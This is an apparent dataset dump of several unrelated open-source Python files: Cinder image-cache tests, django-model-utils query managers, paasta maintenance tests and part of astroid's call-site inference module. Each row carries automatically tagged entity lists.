cache.ensure_space(self.context, self.volume_ovo) + self.assertTrue(has_space) + self.assertEqual(2, mock_delete.call_count) + mock_delete.assert_any_call(self.context, entry2) + mock_delete.assert_any_call(self.context, entry3) + + def test_ensure_space_need_count(self): + cache = self._build_cache(max_gb=30, max_count=2) + mock_delete = mock.patch.object(cache, '_delete_image_volume').start() + + entries = [] + entry1 = self._build_entry(size=10) + entries.append(entry1) + entry2 = self._build_entry(size=5) + entries.append(entry2) + self.mock_db.image_volume_cache_get_all.return_value = entries + + self.volume_ovo.size = 12 + has_space = cache.ensure_space(self.context, self.volume_ovo) + self.assertTrue(has_space) + self.assertEqual(1, mock_delete.call_count) + mock_delete.assert_any_call(self.context, entry2) + + def test_ensure_space_need_gb_and_count(self): + cache = self._build_cache(max_gb=30, max_count=3) + mock_delete = mock.patch.object(cache, '_delete_image_volume').start() + + entries = [] + entry1 = self._build_entry(size=10) + entries.append(entry1) + entry2 = self._build_entry(size=5) + entries.append(entry2) + entry3 = self._build_entry(size=12) + entries.append(entry3) + self.mock_db.image_volume_cache_get_all.return_value = entries + + self.volume_ovo.size = 16 + has_space = cache.ensure_space(self.context, self.volume_ovo) + self.assertTrue(has_space) + self.assertEqual(2, mock_delete.call_count) + mock_delete.assert_any_call(self.context, entry2) + mock_delete.assert_any_call(self.context, entry3) + + def test_ensure_space_cant_free_enough_gb(self): + cache = self._build_cache(max_gb=30, max_count=10) + mock_delete = mock.patch.object(cache, '_delete_image_volume').start() + + entries = list(self._build_entry(size=25)) + self.mock_db.image_volume_cache_get_all.return_value = entries + + self.volume_ovo.size = 50 + has_space = cache.ensure_space(self.context, self.volume_ovo) + self.assertFalse(has_space) + mock_delete.assert_not_called() +",12065,"[['PERSON', 'fake_constants'], ['LOCATION', 'TestCase'], ['PERSON', ""msg['priority""], ['PERSON', ""msg['priority""], ['PERSON', ""msg['priority""], ['PERSON', 'mock_volume_by_id.return_value = mock_volume\n\n '], ['PERSON', ""msg['priority""], ['PERSON', 'entry2'], ['PERSON', 'entry3 = self._build_entry(size=10'], ['PERSON', 'max_count=2'], ['PERSON', 'entry2'], ['PERSON', 'entry2'], ['URL', 'http://www.apache.org/licenses/LICENSE-2.0'], ['URL', 'cinder.im'], ['URL', 'self.mo'], ['URL', 'mock.Mo'], ['URL', 'self.mo'], ['URL', 'mock.Mo'], ['URL', 'self.co'], ['URL', 'ctxt.ge'], ['URL', 'self.co'], ['URL', 'cache.Im'], ['URL', 'self.mo'], ['URL', 'self.mo'], ['URL', 'cache.no'], ['URL', 'self.no'], ['URL', 'self.mo'], ['URL', 'db.im'], ['URL', 'id.re'], ['URL', 'cache.ge'], ['URL', 'self.co'], ['URL', 'self.as'], ['URL', 'self.mo'], ['URL', 'db.im'], ['URL', 'id.re'], ['URL', 'cache.ge'], ['URL', 'self.co'], ['URL', 'self.as'], ['URL', 'self.co'], ['URL', 'self.mo'], ['URL', 'db.im'], ['URL', 'delete.as'], ['URL', 'self.co'], ['URL', 'self.notifier.no'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.notifier.no'], ['URL', 'self.mo'], ['URL', 'used.re'], ['URL', 'ovo.cl'], ['URL', 'self.volume.cl'], ['URL', 'cache.ge'], ['URL', 'self.co'], ['URL', 'self.as'], ['URL', 'self.mo'], ['URL', 'used.as'], ['URL', 'self.co'], ['URL', 'self.notifier.no'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.notifier.no'], ['URL', 'self.mo'], ['URL', 'used.re'], ['URL', 'cache.ge'], ['URL', 'self.co'], ['URL', 'self.as'], ['URL', 'self.notifier.no'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.notifier.no'], ['URL', 'mock.pa'], ['URL', 'cinder.objects.Volume.ge'], ['URL', 'self.mo'], ['URL', 'used.re'], ['URL', 'mock.Ma'], ['URL', 'id.re'], ['URL', 'cache.ge'], ['URL', 'self.co'], ['URL', 'self.as'], ['URL', 'self.mo'], ['URL', 'api.delete.as'], ['URL', 'self.co'], ['URL', 'self.notifier.no'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.notifier.no'], ['URL', 'self.mo'], ['URL', 'db.im'], ['URL', 'create.re'], ['URL', 'cache.cr'], ['URL', 'self.co'], ['URL', 'self.as'], ['URL', 'self.mo'], ['URL', 'db.im'], ['URL', 'create.as'], ['URL', 'self.co'], ['URL', 'ovo.cl'], ['URL', 'ovo.id'], ['URL', 'ovo.si'], ['URL', 'self.co'], ['URL', 'self.as'], ['URL', 'self.volume.si'], ['URL', 'self.co'], ['URL', 'self.as'], ['URL', 'self.mo'], ['URL', 'db.im'], ['URL', 'all.re'], ['URL', 'ovo.si'], ['URL', 'self.co'], ['URL', 'self.as'], ['URL', 'ovo.si'], ['URL', 'self.co'], ['URL', 'self.as'], ['URL', 'mock.pa'], ['URL', 'self.mo'], ['URL', 'db.im'], ['URL', 'all.re'], ['URL', 'ovo.si'], ['URL', 'self.co'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'delete.ca'], ['URL', 'delete.as'], ['URL', 'self.co'], ['URL', 'delete.as'], ['URL', 'self.co'], ['URL', 'mock.pa'], ['URL', 'self.mo'], ['URL', 'db.im'], ['URL', 'all.re'], ['URL', 'ovo.si'], ['URL', 'self.co'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'delete.ca'], ['URL', 'delete.as'], ['URL', 'self.co'], ['URL', 'mock.pa'], ['URL', 'self.mo'], ['URL', 'db.im'], ['URL', 'all.re'], ['URL', 'ovo.si'], ['URL', 'self.co'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'delete.ca'], ['URL', 'delete.as'], ['URL', 'self.co'], ['URL', 'delete.as'], ['URL', 'self.co'], ['URL', 'mock.pa'], ['URL', 'self.mo'], ['URL', 'db.im'], ['URL', 'all.re'], ['URL', 'ovo.si'], ['URL', 'self.co'], ['URL', 'self.as'], ['URL', 'delete.as']]" +73,"from types import ClassType +import warnings + +from django.contrib.contenttypes.models import ContentType +from django.db import models +from django.db.models.fields.related import OneToOneField +from django.db.models.manager import Manager +from django.db.models.query import QuerySet + +import django + +class InheritanceQuerySet(QuerySet): + def select_subclasses(self, *subclasses): + if not subclasses: + subclasses = [rel.var_name for rel in self.model._meta.get_all_related_objects() + if isinstance(rel.field, OneToOneField) + and issubclass(rel.field.model, self.model)] + new_qs = self.select_related(*subclasses) + new_qs.subclasses = subclasses + return new_qs + + def _clone(self, klass=None, setup=False, **kwargs): + for name in ['subclasses', '_annotated']: + if hasattr(self, name): + kwargs[name] = getattr(self, name) + return super(InheritanceQuerySet, self)._clone(klass, setup, **kwargs) + + def annotate(self, *args, **kwargs): + qset = super(InheritanceQuerySet, self).annotate(*args, **kwargs) + qset._annotated = [a.default_alias for a in args] + kwargs.keys() + return qset + + def get_subclass(self, obj): + """""" + FIX see https://bitbucket.PI:KEY + and https://bitbucket.org/carljm/django-model-utils/issue/15/mti-problem-with-select_subclasses + """""" + def get_attribute(obj, s): + try: + return getattr(obj,s, False) + except obj.__class__.DoesNotExist: + return False + + if django.VERSION[0:2] < (1, 5): + sub_obj = [getattr(obj, s) for s in self.subclasses if getattr(obj, s)] or [obj] + else: + sub_obj = [getattr(obj, s) for s in self.subclasses if get_attribute(obj, s)] or [obj] + return sub_obj[0] + + def iterator(self): + iter = super(InheritanceQuerySet, self).iterator() + if getattr(self, 'subclasses', False): + for obj in iter: + sub_obj = self.get_subclass(obj) + if getattr(self, '_annotated', False): + for k in self._annotated: + setattr(sub_obj, k, getattr(obj, k)) + + yield sub_obj + else: + for obj in iter: + yield obj + + +class InheritanceManager(models.Manager): + use_for_related_fields = True + + def get_query_set(self): + return InheritanceQuerySet(self.model) + + def select_subclasses(self, *subclasses): + return self.get_query_set().select_subclasses(*subclasses) + + def get_subclass(self, *args, **kwargs): + return self.get_query_set().select_subclasses().get(*args, **kwargs) + + +class InheritanceCastMixin(object): + def cast(self): + results = tuple(self.values_list('pk', 'real_type')) + type_to_pks = {} + for pk, real_type_id in results: + type_to_pks.setdefault(real_type_id, []).append(pk) + content_types = ContentType.objects.in_bulk(type_to_pks.keys()) + pk_to_child = {} + for real_type_id, pks in type_to_pks.iteritems(): + content_type = content_types[real_type_id] + child_type = content_type.model_class() + children = child_type._default_manager.in_bulk(pks) + for pk, child in children.iteritems(): + pk_to_child[pk] = child + children = [] + # sort children into same order as parents where returned + for pk, real_type_id in results: + children.append(pk_to_child[pk]) + return children + + +class QueryManager(models.Manager): + def __init__(self, *args, **kwargs): + if args: + self._q = args[0] + else: + self._q = models.Q(**kwargs) + super(QueryManager, self).__init__() + + def order_by(self, *args): + self._order_by = args + return self + + def get_query_set(self): + qs = super(QueryManager, self).get_query_set().filter(self._q) + if hasattr(self, '_order_by'): + return qs.order_by(*self._order_by) + return qs + + +class PassThroughManager(models.Manager): + """""" + Inherit from this Manager to enable you to call any methods from your + custom QuerySet class from your manager. Simply define your QuerySet + class, and return an instance of it from your manager's `get_query_set` + method. + + Alternately, if you don't need any extra methods on your manager that + aren't on your QuerySet, then just pass your QuerySet class to the + ``for_queryset_class`` class method. + + class PostQuerySet(QuerySet): + def enabled(self): + return self.filter(disabled=False) + + class Post(models.Model): + objects = PassThroughManager.for_queryset_class(PostQuerySet)() + + """""" + # pickling causes recursion errors + _deny_methods = ['__getstate__', '__setstate__', '_db'] + + def __init__(self, queryset_cls=None): + self._queryset_cls = queryset_cls + super(PassThroughManager, self).__init__() + + def __getattr__(self, name): + if name in self._deny_methods: + raise AttributeError(name) + return getattr(self.get_query_set(), name) + + def get_query_set(self): + if self._queryset_cls is not None: + kargs = {'model': self.model} + if hasattr(self, '_db'): + kargs['using'] = self._db + return self._queryset_cls(**kargs) + return super(PassThroughManager, self).get_query_set() + + @classmethod + def for_queryset_class(cls, queryset_cls): + class _PassThroughManager(cls): + def __init__(self): + return super(_PassThroughManager, self).__init__() + + def get_query_set(self): + kwargs = {} + if hasattr(self, ""_db""): + kwargs[""using""] = self._db + return queryset_cls(self.model, **kwargs) + + return _PassThroughManager + + +def manager_from(*mixins, **kwds): + """""" + Returns a Manager instance with extra methods, also available and + chainable on generated querysets. + + (By George Sakkis, originally posted at + http://djangosnippets.org/snippets/2117/) + + :param mixins: Each ``mixin`` can be either a class or a function. The + generated manager and associated queryset subclasses extend the mixin + classes and include the mixin functions (as methods). + + :keyword queryset_cls: The base queryset class to extend from + (``django.db.models.query.QuerySet`` by default). + + :keyword manager_cls: The base manager class to extend from + (``django.db.models.manager.Manager`` by default). + + """""" + warnings.warn( + ""manager_from is pending deprecation; use PassThroughManager instead."", + PendingDeprecationWarning, + stacklevel=2) + # collect separately the mixin classes and methods + bases = [kwds.get('queryset_cls', QuerySet)] + methods = {} + for mixin in mixins: + if isinstance(mixin, (ClassType, type)): + bases.append(mixin) + else: + try: methods[mixin.__name__] = mixin + except AttributeError: + raise TypeError('Mixin must be class or function, not %s' % + mixin.__class__) + # create the QuerySet subclass + id = hash(mixins + tuple(kwds.iteritems())) + new_queryset_cls = type('Queryset_%d' % id, tuple(bases), methods) + # create the Manager subclass + bases[0] = manager_cls = kwds.get('manager_cls', Manager) + new_manager_cls = type('Manager_%d' % id, tuple(bases), methods) + # and finally override new manager's get_query_set + super_get_query_set = manager_cls.get_query_set + def get_query_set(self): + # first honor the super manager's get_query_set + qs = super_get_query_set(self) + # and then try to bless the returned queryset by reassigning it to the + # newly created Queryset class, though this may not be feasible + if not issubclass(new_queryset_cls, qs.__class__): + raise TypeError('QuerySet subclass conflict: cannot determine a ' + 'unique class for queryset instance') + qs.__class__ = new_queryset_cls + return qs + new_manager_cls.get_query_set = get_query_set + return new_manager_cls() +",8353,"[['PERSON', 'qset = super(InheritanceQuerySet'], ['NRP', 'sub_obj'], ['PERSON', 'order_by'], ['PERSON', 'kargs'], ['PERSON', 'kwds'], ['PERSON', 'George Sakkis'], ['PERSON', 'mixin.__class'], ['LOCATION', 'qs.__class'], ['URL', 'https://bitbucket.org/carljm/django-model-utils/issue/15/mti-problem-with-select_subclasses'], ['URL', 'http://djangosnippets.org/snippets/2117/'], ['URL', 'django.contrib.contenttypes.mo'], ['URL', 'django.db.models.fields.re'], ['URL', 'django.db.models.ma'], ['URL', 'django.db.mo'], ['URL', 'rel.va'], ['URL', 'self.mo'], ['URL', 'meta.ge'], ['URL', 'rel.fi'], ['URL', 'rel.field.mo'], ['URL', 'self.mo'], ['URL', 'self.se'], ['URL', 'qs.su'], ['URL', 'a.de'], ['URL', 'kwargs.ke'], ['URL', 'django.VE'], ['URL', 'self.su'], ['URL', 'self.su'], ['URL', 'self.ge'], ['URL', 'models.Ma'], ['URL', 'self.mo'], ['URL', 'self.ge'], ['URL', 'self.ge'], ['URL', 'self.va'], ['URL', 'pks.se'], ['URL', 'ContentType.objects.in'], ['URL', 'pks.ke'], ['URL', 'pks.it'], ['URL', 'type.mo'], ['URL', 'manager.in'], ['URL', 'children.it'], ['URL', 'models.Ma'], ['URL', 'models.Ma'], ['URL', 'self.fi'], ['URL', 'models.Mo'], ['URL', 'PassThroughManager.fo'], ['URL', 'self.ge'], ['URL', 'self.mo'], ['URL', 'self.mo'], ['URL', 'django.db.mo'], ['URL', 'django.db.models.manager.Ma'], ['URL', 'kwds.ge'], ['URL', 'kwds.it'], ['URL', 'kwds.ge'], ['URL', 'cls.ge'], ['URL', 'cls.ge']]" +74,"# Copyright 2015-2016 Yelp Inc. +# +# Licensed under the Apache License, Version 2.0 (the ""License""); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an ""AS IS"" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +import mock + +from paasta_tools import paasta_maintenance + + +@mock.patch(""paasta_tools.mesos_maintenance.is_host_drained"", autospec=True) +@mock.patch( + ""paasta_tools.mesos_maintenance.get_hosts_past_maintenance_start"", autospec=True +) +def test_is_safe_to_kill(mock_get_hosts_past_maintenance_start, mock_is_host_drained): + mock_is_host_drained.return_value = False + mock_get_hosts_past_maintenance_start.return_value = [] + assert not paasta_maintenance.is_safe_to_kill(""blah"") + + mock_is_host_drained.return_value = False + mock_get_hosts_past_maintenance_start.return_value = [""blah""] + assert paasta_maintenance.is_safe_to_kill(""blah"") + + mock_is_host_drained.return_value = True + mock_get_hosts_past_maintenance_start.return_value = [""blah""] + assert paasta_maintenance.is_safe_to_kill(""blah"") + + mock_is_host_drained.return_value = True + mock_get_hosts_past_maintenance_start.return_value = [] + assert paasta_maintenance.is_safe_to_kill(""blah"") + + +@mock.patch(""paasta_tools.paasta_maintenance.is_hostname_local"", autospec=True) +def test_is_safe_to_drain_rejects_non_localhosts(mock_is_hostname_local,): + mock_is_hostname_local.return_value = False + assert paasta_maintenance.is_safe_to_drain(""non-localhost"") is False + + +@mock.patch(""paasta_tools.paasta_maintenance.getfqdn"", autospec=True) +@mock.patch(""paasta_tools.paasta_maintenance.gethostname"", autospec=True) +def test_is_hostname_local_works(mock_gethostname, mock_getfqdn): + mock_gethostname.return_value = ""foo"" + mock_getfqdn.return_value = ""foo.bar"" + assert paasta_maintenance.is_hostname_local(""localhost"") is True + assert paasta_maintenance.is_hostname_local(""foo"") is True + assert paasta_maintenance.is_hostname_local(""foo.bar"") is True + assert paasta_maintenance.is_hostname_local(""something_different"") is False + + +@mock.patch( + ""paasta_tools.paasta_maintenance.utils.load_system_paasta_config"", autospec=True +) +def test_are_local_tasks_in_danger_fails_safe_with_false( + mock_load_system_paasta_config, +): + """"""If something unexpected happens that we don't know how to + interpret, we make sure that we fail with ""False"" so that processes + move on and don't deadlock. In general the answer to ""is it safe to drain"" + is ""yes"" if mesos can't be reached, etc"""""" + mock_load_system_paasta_config.side_effect = Exception + assert paasta_maintenance.are_local_tasks_in_danger() is False + + +@mock.patch( + ""paasta_tools.paasta_maintenance.utils.load_system_paasta_config"", autospec=True +) +@mock.patch( + ""paasta_tools.paasta_maintenance.marathon_services_running_here"", autospec=True +) +def test_are_local_tasks_in_danger_is_false_with_nothing_running( + mock_marathon_services_running_here, mock_load_system_paasta_config +): + mock_marathon_services_running_here.return_value = [] + assert paasta_maintenance.are_local_tasks_in_danger() is False + + +@mock.patch( + ""paasta_tools.paasta_maintenance.utils.load_system_paasta_config"", autospec=True +) +@mock.patch( + ""paasta_tools.paasta_maintenance.marathon_services_running_here"", autospec=True +) +@mock.patch(""paasta_tools.paasta_maintenance.get_backends"", autospec=True) +@mock.patch(""paasta_tools.paasta_maintenance.is_healthy_in_haproxy"", autospec=True) +def test_are_local_tasks_in_danger_is_false_with_an_unhealthy_service( + mock_is_healthy_in_haproxy, + mock_get_backends, + mock_marathon_services_running_here, + mock_load_system_paasta_config, +): + mock_is_healthy_in_haproxy.return_value = False + mock_marathon_services_running_here.return_value = [(""service"", ""instance"", 42)] + assert paasta_maintenance.are_local_tasks_in_danger() is False + mock_is_healthy_in_haproxy.assert_called_once_with(42, mock.ANY) + + +@mock.patch( + ""paasta_tools.paasta_maintenance.utils.load_system_paasta_config"", autospec=True +) +@mock.patch( + ""paasta_tools.paasta_maintenance.marathon_services_running_here"", autospec=True +) +@mock.patch(""paasta_tools.paasta_maintenance.get_backends"", autospec=True) +@mock.patch(""paasta_tools.paasta_maintenance.is_healthy_in_haproxy"", autospec=True) +@mock.patch(""paasta_tools.paasta_maintenance.synapse_replication_is_low"", autospec=True) +def test_are_local_tasks_in_danger_is_true_with_an_healthy_service_in_danger( + mock_synapse_replication_is_low, + mock_is_healthy_in_haproxy, + mock_get_backends, + mock_marathon_services_running_here, + mock_load_system_paasta_config, +): + mock_is_healthy_in_haproxy.return_value = True + mock_synapse_replication_is_low.return_value = True + mock_marathon_services_running_here.return_value = [(""service"", ""instance"", 42)] + assert paasta_maintenance.are_local_tasks_in_danger() is True + mock_is_healthy_in_haproxy.assert_called_once_with(42, mock.ANY) + assert mock_synapse_replication_is_low.call_count == 1 + + +@mock.patch( + ""paasta_tools.paasta_maintenance.load_marathon_service_config"", autospec=True +) +@mock.patch( + ""paasta_tools.paasta_maintenance.load_smartstack_info_for_service"", autospec=True +) +@mock.patch( + ""paasta_tools.paasta_maintenance.get_expected_instance_count_for_namespace"", + autospec=True, +) +@mock.patch( + ""paasta_tools.paasta_maintenance.get_replication_for_services"", autospec=True +) +def test_synapse_replication_is_low_understands_underreplicated_services( + mock_get_replication_for_services, + mock_get_expected_instance_count_for_namespace, + mock_load_smartstack_info_for_service, + mock_load_marathon_service_config, +): + mock_load_marathon_service_config.return_value.get_registrations.return_value = ( + ""service.main"" + ) + mock_get_expected_instance_count_for_namespace.return_value = 3 + mock_load_smartstack_info_for_service.return_value = { + ""local_region"": {""service.main"": ""up""} + } + mock_get_replication_for_services.return_value = {""service.main"": 1} + local_backends = [""foo""] + system_paasta_config = mock.MagicMock() + assert ( + paasta_maintenance.synapse_replication_is_low( + service=""service"", + instance=""instance"", + system_paasta_config=system_paasta_config, + local_backends=local_backends, + ) + is True + ) + + +@mock.patch(""paasta_tools.paasta_maintenance.gethostbyname"", autospec=True) +def test_is_healthy_in_harproxy_healthy_path(mock_gethostbyname,): + mock_gethostbyname.return_value = ""127.0.0.1"" + local_port = 42 + backends = [ + {""status"": ""UP"", ""pxname"": ""service.main"", ""svname"": ""127.0.0.1:42_hostname""} + ] + assert ( + paasta_maintenance.is_healthy_in_haproxy( + local_port=local_port, backends=backends + ) + is True + ) + + +@mock.patch(""paasta_tools.paasta_maintenance.gethostbyname"", autospec=True) +def test_is_healthy_in_haproxy_unhealthy_path(mock_gethostbyname,): + mock_gethostbyname.return_value = ""127.0.0.1"" + local_port = 42 + backends = [ + {""status"": ""DOWN"", ""pxname"": ""service.main"", ""svname"": ""127.0.0.1:42_hostname""} + ] + assert ( + paasta_maintenance.is_healthy_in_haproxy( + local_port=local_port, backends=backends + ) + is False + ) + + +@mock.patch(""paasta_tools.paasta_maintenance.gethostbyname"", autospec=True) +def test_is_healthy_in_haproxy_missing_backend_entirely(mock_gethostbyname,): + mock_gethostbyname.return_value = ""127.0.0.1"" + local_port = 42 + backends = [ + { + ""status"": ""DOWN"", + ""pxname"": ""service.main"", + ""svname"": ""127.0.0.1:666_otherhostname"", + } + ] + assert ( + paasta_maintenance.is_healthy_in_haproxy( + local_port=local_port, backends=backends + ) + is False + ) +",8242,"[['DATE_TIME', '2015-2016'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['LOCATION', 'paasta_maintenance.is_safe_to_drain(""non'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', '@mock.patch(""paasta_tools.paasta_maintenance.is_healthy_in_haproxy'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', '@mock.patch(""paasta_tools.paasta_maintenance.is_healthy_in_haproxy'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['NRP', 'mock_synapse_replication_is_low.call_count =='], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['URL', 'http://www.apache.org/licenses/LICENSE-2.0'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['URL', 'mock.pa'], ['URL', 'tools.me'], ['URL', 'maintenance.is'], ['URL', 'mock.pa'], ['URL', 'tools.me'], ['URL', 'maintenance.ge'], ['URL', 'drained.re'], ['URL', 'start.re'], ['URL', 'maintenance.is'], ['URL', 'drained.re'], ['URL', 'start.re'], ['URL', 'maintenance.is'], ['URL', 'drained.re'], ['URL', 'start.re'], ['URL', 'maintenance.is'], ['URL', 'drained.re'], ['URL', 'start.re'], ['URL', 'maintenance.is'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.is'], ['URL', 'local.re'], ['URL', 'maintenance.is'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.ge'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.ge'], ['URL', 'gethostname.re'], ['URL', 'getfqdn.re'], ['URL', 'foo.ba'], ['URL', 'maintenance.is'], ['URL', 'maintenance.is'], ['URL', 'maintenance.is'], ['URL', 'foo.ba'], ['URL', 'maintenance.is'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'config.si'], ['URL', 'maintenance.ar'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.ma'], ['URL', 'here.re'], ['URL', 'maintenance.ar'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.ma'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.ge'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.is'], ['URL', 'haproxy.re'], ['URL', 'here.re'], ['URL', 'maintenance.ar'], ['URL', 'haproxy.as'], ['URL', 'mock.AN'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.ma'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.ge'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.is'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.sy'], ['URL', 'haproxy.re'], ['URL', 'low.re'], ['URL', 'here.re'], ['URL', 'maintenance.ar'], ['URL', 'haproxy.as'], ['URL', 'mock.AN'], ['URL', 'low.ca'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.ge'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.ge'], ['URL', 'config.re'], ['URL', 'value.ge'], ['URL', 'registrations.re'], ['URL', 'service.ma'], ['URL', 'namespace.re'], ['URL', 'service.re'], ['URL', 'service.ma'], ['URL', 'services.re'], ['URL', 'service.ma'], ['URL', 'mock.Ma'], ['URL', 'maintenance.sy'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.ge'], ['URL', 'gethostbyname.re'], ['URL', 'service.ma'], ['URL', 'maintenance.is'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.ge'], ['URL', 'gethostbyname.re'], ['URL', 'service.ma'], ['URL', 'maintenance.is'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.ge'], ['URL', 'gethostbyname.re'], ['URL', 'service.ma'], ['URL', 'maintenance.is']]" +75,"# Copyright (c) 2015-2016, 2018-2020 Claudiu Popa dummy@email.com +# Copyright (c) 2015-2016 Ceridwen dummy@email.com +# Copyright (c) 2018 Bryce Guinta dummy@email.com +# Copyright (c) 2018 Nick Drozd dummy@email.com +# Copyright (c) 2018 Anthony Sottile dummy@email.com +# Copyright (c) 2020 hippo91 dummy@email.com +# Copyright (c) 2021 Pierre Sassoulas dummy@email.com + +# Licensed under the LGPL: https://www.gnu.org/licenses/old-licenses/lgpl-2.1.en.html +# For details: https://github.com/PyCQA/astroid/blob/master/LICENSE + + +from astroid import bases +from astroid import context as contextmod +from astroid import exceptions, nodes, util + + +class CallSite: + """"""Class for understanding arguments passed into a call site + + It needs a call context, which contains the arguments and the + keyword arguments that were passed into a given call site. + In order to infer what an argument represents, call :meth:`infer_argument` + with the corresponding function node and the argument name. + + :param callcontext: + An instance of :class:`astroid.context.CallContext`, that holds + the arguments for the call site. + :param argument_context_map: + Additional contexts per node, passed in from :attr:`astroid.context.Context.extra_context` + :param context: + An instance of :class:`astroid.context.Context`. + """""" + + def __init__(self, callcontext, argument_context_map=None, context=None): + if argument_context_map is None: + argument_context_map = {} + self.argument_context_map = argument_context_map + args = callcontext.args + keywords = callcontext.keywords + self.duplicated_keywords = set() + self._unpacked_args = self._unpack_args(args, context=context) + self._unpacked_kwargs = self._unpack_keywords(keywords, context=context) + + self.positional_arguments = [ + arg for arg in self._unpacked_args if arg is not util.Uninferable + ] + self.keyword_arguments = { + key: value + for key, value in self._unpacked_kwargs.items() + if value is not util.Uninferable + } + + @classmethod + def from_call(cls, call_node, context=None): + """"""Get a CallSite object from the given Call node. + + :param context: + An instance of :class:`astroid.context.Context` that will be used + to force a single inference path. + """""" + + # Determine the callcontext from the given `context` object if any. + context = context or contextmod.InferenceContext() + callcontext = contextmod.CallContext(call_node.args, call_node.keywords) + return cls(callcontext, context=context) + + def has_invalid_arguments(self): + """"""Check if in the current CallSite were passed *invalid* arguments + + This can mean multiple things. For instance, if an unpacking + of an invalid object was passed, then this method will return True. + Other cases can be when the arguments can't be inferred by astroid, + for example, by passing objects which aren't known statically. + """""" + return len(self.positional_arguments) != len(self._unpacked_args) + + def has_invalid_keywords(self): + """"""Check if in the current CallSite were passed *invalid* keyword arguments + + For instance, unpacking a dictionary with integer keys is invalid + (**{1:2}), because the keys must be strings, which will make this + method to return True. Other cases where this might return True if + objects which can't be inferred were passed. + """""" + return len(self.keyword_arguments) != len(self._unpacked_kwargs) + + def _unpack_keywords(self, keywords, context=None): + values = {} + context = context or contextmod.InferenceContext() + context.extra_context = self.argument_context_map + for name, value in keywords: + if name is None: + # Then it's an unpacking operation (**) + try: + inferred = next(value.infer(context=context)) + except exceptions.InferenceError: + values[name] = util.Uninferable + continue + + if not isinstance(inferred, nodes.Dict): + # Not something we can work with. + values[name] = util.Uninferable + continue + + for dict_key, dict_value in inferred.items: + try: + dict_key = next(dict_key.infer(context=context)) + except exceptions.InferenceError: + values[name] = util.Uninferable + continue + if not isinstance(dict_key, nodes.Const): + values[name] = util.Uninferable + continue + if not isinstance(dict_key.value, str): + values[name] = util.Uninferable + continue + if dict_key.value in values: + # The name is already in the dictionary + values[dict_key.value] = util.Uninferable + self.duplicated_keywords.add(dict_key.value) + continue + values[dict_key.value] = dict_value + else: + values[name] = value + return values + + def _unpack_args(self, args, context=None): + values = [] + context = context or contextmod.InferenceContext() + context.extra_context = self.argument_context_map + for arg in args: + if isinstance(arg, nodes.Starred): + try: + inferred = next(arg.value.infer(context=context)) + except exceptions.InferenceError: + values.append(util.Uninferable) + continue + + if inferred is util.Uninferable: + values.append(util.Uninferable) + continue + if not hasattr(inferred, ""elts""): + values.append(util.Uninferable) + continue + values.extend(inferred.elts) + else: + values.append(arg) + return values + + def infer_argument(self, funcnode, name, context): + """"""infer a function argument value according to the call context + + Arguments: + funcnode: The function being called. + name: The name of the argument whose value is being inferred. + context: Inference context object + """""" + if name in self.duplicated_keywords: + raise exceptions.InferenceError( + ""The arguments passed to {func!r} "" "" have duplicate keywords."", + call_site=self, + func=funcnode, + 